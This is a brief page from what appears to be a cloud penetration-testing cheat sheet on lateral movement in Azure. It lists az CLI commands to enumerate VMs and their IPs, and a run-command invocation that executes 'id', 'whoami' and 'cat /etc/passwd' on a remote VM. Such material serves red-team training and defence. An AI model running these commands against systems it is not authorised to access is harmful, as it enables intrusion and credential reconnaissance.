Lateral Movement

- vm-runcommand Lateral Movement

Lists all virtual machines in the Azure subscription:

az vm list

Retrieves the IP addresses of a specific virtual machine:

az vm list-ip-addresses --resource-group {Resource Group} --name {VM Name}

Lists role definitions related to the VM run command:

az role definition list -n vm-runcommand

Executes a commands on a remote Azure VM:

az vm run-command invoke --resource-group {Resource Group} -n {VM Name} --command-id RunShellScript --scripts "id && hostname && whoami && cat /etc/passwd"

Invoke-AzVMRunCommand -ResourceGroupName $ResourceGroupName -VMName $VMName -CommandId RunPowerShellScript -ScriptPath ./powershell-script.ps1

PreviousPrivilege Escalation NextPersistence

Last updated 4 months ago